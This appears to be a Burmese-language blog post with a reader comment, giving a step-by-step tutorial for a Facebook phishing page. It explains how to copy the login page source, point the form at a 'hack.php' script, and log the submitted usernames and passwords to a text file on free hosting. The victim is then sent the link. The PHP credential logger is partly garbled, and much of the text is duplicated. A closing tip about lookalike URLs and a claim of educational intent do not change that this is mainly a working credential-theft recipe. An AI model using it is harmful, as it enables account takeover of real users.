ပထမဆုံး ကိုယ္ဟက္ခ်င္တဲ့ Website login page ကို ေခၚရပါမယ္။ facebook နဲ႔လုပ္ျပပါ့မယ္။ www.facebook.com
ကို URL Bar မွာ ရိုက္ထည့္ပါ။ ေပၚလာတဲ့ Page ေပၚမွာ Right
Click>>View Page Source ဆိုတာကို ေရြးလိုက္ရင္ Facebook Login နဲ႔
ပတ္သက္တဲ့ ကုတ္ေတြက်လာပါလိမ့္မယ္။ အဲဒီကုတ္ေတြကို အကုန္ Copy+Paste နဲ႔
Notepad File ထဲမွာ ေကာ္ပီကူးထည့္လိုက္ပါ။ ေနာက္တဆင့္ကေတာ့ အေရးႀကီးပါတယ္။
Password ကို ၾကားျဖတ္ခိုးတဲ့ အဆင့္ေလးပါ။ Ctrl+F ကိုသုံးပီးေတာ့ ခုနက
Notepad file ထဲမွာ "action" ဆိုတဲ့ စာလုံးေလးကို ရွာပါ။ အဲလိုရွာလိုက္ရင္
action="https://www.facebook.com/login.php?login_attempt=1"
method="post" ဒီစာေၾကာင္းေလးကို ရွာေတြ႕ပါလိမ့္မယ္။ အဲဒီဟာကို
action="hack.php?" method="post" ဒီလိုေလး ျပင္ေရးလိုက္ပါ။ ပီးေတာ့
ဒီဖိုင္ကို index.html ဆိုတဲ့ နာမည္နဲ႔ Save လုပ္လိုက္ပါ။ ပီးရင္
ပိတ္လိုက္ပါ။ ေနာက္ထပ္ Notepad တစ္ခု အသစ္ဖြင့္လိုက္ပါ။ အဲဒီထဲမွာ ေအာက္က
ကုတ္ေတြကို ေကာ္ပီကူးထည့္လိုက္ပါ။
$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
အဲဒီဖိုင္ကို hack.php ဆိုတဲ့နာမည္နဲ႔ Save လုပ္လိုက္ပါ။ ပီးေတာ့ pswrds.txt ဆိုတဲ့ ဖိုင္အလြတ္တစ္ခုတည္ေဆာက္ထားလိုက္ပါ။ ဒါဆိုရင္ index.html, hack.php, pswrds.txt ဆိုတဲ့ ဖိုင္သုံးခု ရွိပီျဖစ္ပါတယ္။ အဲဒီဖိုင္သုံးခုကို Free Hosting Website တခုမွာတင္လိုက္ပါ။ ပီးေတာ့ index.html ဆိုတဲ့ File ရဲ႕ link ေလးကို ကိုယ္ဟက္လုိတဲ့အေကာင့္ပိုင္ရွင္ဆီပို႔လိုက္ပါ။ တကယ္လို႔သူသာ အဲဒီ Fake Facebook Login Form အတုေပၚမွာ သူ႔ရဲ႕ username and password ရိုက္ပီး ဝင္ခဲ့မယ္ဆိုလ်င္ သူ႔ရဲ႕ username password သင့္ဆီေရာက္လာမွာပါ။ ဘယ္လိုေရာက္လာမွာလဲဆိုရင္ Hosting ေပၚမွာ တင္ထားတဲ့ pswrds.txt ဆိုတဲ့ ဖိုင္ကို download လုပ္လုိက္ရင္ အဲဒီမွာ username and password ေတြကိုေတြ႕ႏိုင္မွာျဖစ္ပါတယ္။ ဘယ္သူ႔ကိုမွ ထိခိုက္ေစဖို႔မရည္ရြယ္ပါဘူး။ သိေစလိုတဲ့ေစတနာနဲ႔ အသိပညာ ျဖန္႔ေဝေပးျခင္းျဖစ္ပါတယ္။ ဆရာ့ဆရာႀကီးေတြအမ်ားႀကီးရွိတယ္ဆိုတာလည္းသိပါတယ္။ ဒါေပမယ့္ မသိေသးတဲ့လူေတြသိေအာင္ သိပီးရင္ ကိုယ့္လဲ အဲဒီ website အတုေတြကို ေရွာင္ရွားႏိုင္ေအာင္ ရည္ရြယ္ပါတယ္။ ကာကြယ္ရန္။ URL bar မွာ www.facebook.com လို႔မေပၚဘဲ www.faceboook.mm အစသျဖင့္ နာမည္ ဆင္တူေလး ေတြကို သတိထားပီးၾကည့္လိုက္ရ္ ဘယ္လိုမွ ကိုယ့္ password မေပါက္ၾကားပါဘူးခင္ဗ်ား။ Enjoy Hacking!!
$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
အဲဒီဖိုင္ကို hack.php ဆိုတဲ့နာမည္နဲ႔ Save လုပ္လိုက္ပါ။ ပီးေတာ့ pswrds.txt ဆိုတဲ့ ဖိုင္အလြတ္တစ္ခုတည္ေဆာက္ထားလိုက္ပါ။ ဒါဆိုရင္ index.html, hack.php, pswrds.txt ဆိုတဲ့ ဖိုင္သုံးခု ရွိပီျဖစ္ပါတယ္။ အဲဒီဖိုင္သုံးခုကို Free Hosting Website တခုမွာတင္လိုက္ပါ။ ပီးေတာ့ index.html ဆိုတဲ့ File ရဲ႕ link ေလးကို ကိုယ္ဟက္လုိတဲ့အေကာင့္ပိုင္ရွင္ဆီပို႔လိုက္ပါ။ တကယ္လို႔သူသာ အဲဒီ Fake Facebook Login Form အတုေပၚမွာ သူ႔ရဲ႕ username and password ရိုက္ပီး ဝင္ခဲ့မယ္ဆိုလ်င္ သူ႔ရဲ႕ username password သင့္ဆီေရာက္လာမွာပါ။ ဘယ္လိုေရာက္လာမွာလဲဆိုရင္ Hosting ေပၚမွာ တင္ထားတဲ့ pswrds.txt ဆိုတဲ့ ဖိုင္ကို download လုပ္လုိက္ရင္ အဲဒီမွာ username and password ေတြကိုေတြ႕ႏိုင္မွာျဖစ္ပါတယ္။ ဘယ္သူ႔ကိုမွ ထိခိုက္ေစဖို႔မရည္ရြယ္ပါဘူး။ သိေစလိုတဲ့ေစတနာနဲ႔ အသိပညာ ျဖန္႔ေဝေပးျခင္းျဖစ္ပါတယ္။ ဆရာ့ဆရာႀကီးေတြအမ်ားႀကီးရွိတယ္ဆိုတာလည္းသိပါတယ္။ ဒါေပမယ့္ မသိေသးတဲ့လူေတြသိေအာင္ သိပီးရင္ ကိုယ့္လဲ အဲဒီ website အတုေတြကို ေရွာင္ရွားႏိုင္ေအာင္ ရည္ရြယ္ပါတယ္။ ကာကြယ္ရန္။ URL bar မွာ www.facebook.com လို႔မေပၚဘဲ www.faceboook.mm အစသျဖင့္ နာမည္ ဆင္တူေလး ေတြကို သတိထားပီးၾကည့္လိုက္ရ္ ဘယ္လိုမွ ကိုယ့္ password မေပါက္ၾကားပါဘူးခင္ဗ်ား။ Enjoy Hacking!!
Free Hosting Website ဆိုတာဘာကိုေျပာတာပါလဲ
ReplyDelete4shared_Desktop_ဆိုတာမ်ိဳးပါလားမသိ